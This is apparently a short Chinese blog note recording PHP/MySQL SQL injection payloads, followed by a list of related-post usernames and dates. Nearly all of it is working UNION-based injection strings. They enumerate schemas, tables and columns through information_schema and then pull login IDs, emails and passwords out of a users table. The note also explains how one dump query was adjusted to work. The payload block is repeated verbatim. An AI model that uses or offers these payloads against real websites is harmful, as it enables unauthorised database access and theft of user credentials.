php 注入 记录一下
暴库名\表名\列名
/**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch
ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1--
碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个,但是密码字段只有4个是有值的,所以暴不出来,改了下语句可以了.
union+select+count(pasd)+from+users--
+union+select+concat(loginID,0x3a,email,0x3a,pasd)+from+users+where+length(pasd)>0+limit+N,1--
或者冰的原点提供的
/union/**/select/**/unhex(hex(group_concat(loginID,0x3a,pasd)))+FROM+users--
/**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch
ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1--
碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个,但是密码字段只有4个是有值的,所以暴不出来,改了下语句可以了.
union+select+count(pasd)+from+users--
+union+select+concat(loginID,0x3a,email,0x3a,pasd)+from+users+where+length(pasd)>0+limit+N,1--
或者冰的原点提供的
/union/**/select/**/unhex(hex(group_concat(loginID,0x3a,pasd)))+FROM+users--
相关推荐
zyyjay 2020-11-09
xuebingnan 2020-11-05
samtrue 2020-11-22
stefan0 2020-11-22
yifangs 2020-10-13
songshijiazuaa 2020-09-24
hebiwtc 2020-09-18
天步 2020-09-17
83911535 2020-11-13
whatsyourname 2020-11-13
zhouyuqi 2020-11-10
Noneyes 2020-11-10
mathchao 2020-10-28
王志龙 2020-10-28
wwwsurfphpseocom 2020-10-28
diskingchuan 2020-10-23
savorTheFlavor 2020-10-23